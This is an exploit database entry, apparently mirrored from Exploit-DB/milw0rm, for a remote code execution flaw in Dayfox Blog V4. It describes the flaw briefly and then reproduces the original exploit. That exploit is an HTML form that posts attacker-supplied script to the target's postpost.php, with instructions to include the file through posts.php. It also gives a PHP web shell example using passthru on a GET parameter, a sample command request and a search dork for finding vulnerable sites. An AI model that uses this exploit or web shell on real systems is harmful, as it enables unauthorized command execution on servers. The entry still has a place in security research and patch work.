Dayfox Blog V 4 Remote Code Execution

vendor:

Dayfox Blog

by:

Dj7xpl

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Dayfox Blog

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Dayfox Blog V 4 Remote Code Execution

This exploit allows an attacker to insert arbitrary scripts into a text file and include it in the 'Posts.php' file, leading to remote code execution.

Mitigation:

The vendor should release a patch to fix this vulnerability and prevent remote code execution.

Source

Exploit-DB raw data:

<html>
<!--
                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Dayfox Blog V 4
#   Download   :   http://www.dayfoxdesigns.co.nr
#   Dork       :   "Powered by Dayfox Designs"
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote Code Execution)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   1- Insert Your Script In Text File By This Exploit     Example: <?php passthru($_GET[cmd]); ?>
#   2- include Text File By (Posts.php)                    Example: http://localhost/dfblog/posts.php?cmd=ls -la
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

-->
<head><title>--======Dj7xpl======--</title></head>
<body background=http://dj7xpl.by.ru/img/scan.gif> 
<center>
<form action="http://[Target]/[path]/postpost.php" method="post">
            <input type="hidden" name="title" value="Dj7xpl" />
	        <input type="hidden"  name="blog" value="script" /><br><br>
			<font color=#C0FF3E size=+1>your script:<br>
            <textarea name="cat">&lt;/textarea&gt;
	        <input type="hidden" name="date" value="Hello All" />
	        <input type="hidden" name="catyear" value="dj7xpl" />
       	    <input  type="hidden" name="catmonth" value"dj7xpl" />
				<input type="submit" value="write" />
			</form>
			</center>
			</body
			</html>

# milw0rm.com [2007-03-14]